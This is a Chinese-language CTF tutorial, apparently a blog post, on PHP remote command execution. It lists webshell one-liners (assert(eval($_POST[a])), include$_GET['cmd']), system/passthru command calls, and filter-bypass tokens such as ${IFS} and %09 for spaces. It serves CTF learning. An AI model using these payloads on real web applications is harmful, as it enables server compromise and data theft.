CTF php RCE (一)

0x01 引言

首先进入题目 应该是大部分都是一段白盒PHP审计，然后我们为了命令执行，绕过或者是钻空子等等操作，来拿到flag

0x02 基础

0x01 传参方式

这里有两个工具，hackbar和burpsuite,这两个工具非常实用


大家可以自己Google或者百度搜索安装，安装包的话，私信我可以给你哦
常见的就是GET和POST传参

通俗点讲的话GET 传参就是在url(链接后面拼接键值对)

键值对我也讲不明白
就是c=1 这里的 c 是键，1 是值

例子

url/?c=echo `ls /`;

POST 的话我们就要打开post传参方式

在BP中我们右键，然后选择change request method即可进行切换

这里的特点是hackbar的POST不能直接传值，只能传键值对，bp可以直接传值
而且有时候如果你使用hackbar进行传参的话没有反应（就是没有传上去的感觉payload没有改变），那么我建议你进行url编码，如果还没有反应那么再编

0x02 常用函数和命令

弹

首先最常用的应该是弹了吧，好吧也不是那么的常用，但是在比较方便的场面我觉得还是相当好用的，可以看我写的那篇弹shellblog，看看基础命令

函数

其实我在很多博客中看到说不算function，但是我觉得吧，还行，反正就是命令执行的简介吧，你一看到eval你就知道这题是RCE，主要就是写🐎常用

assert()
有些版本比如7.0，
直接写<?php  ?>并不好使，或者说被禁用了php那么可以这么写🐎
我们需要调用eval拼接为assert(eval($_POST[a]))

system
passthru
这两个函数相当常用
system('ls /');
system("ls /");
这二者有时候可能结果一样，但是其内涵不同，而且有时候单引号能触发，但是双引号不一定能触发，所以多多尝试

php -r 'echo `ls`;'
开启php引擎，进行命令执行

这几种都会使用到分号 ，
所以也出现了include包含来面对这种东西

include$_GET["cmd"]?>
include$_POST["cmd"]?>
然后cmd传日志文件传马或者是php伪协议外带文件内容

?><?=`ls` 等同于system

0x03 空格绕过

%09(tab)
${IFS}
$IFS$1
${IFS}$1       //这后面的数字随便0-9都可以只是
%09 (空格)
%0a     (回车)
\x20     (空格)
<>
<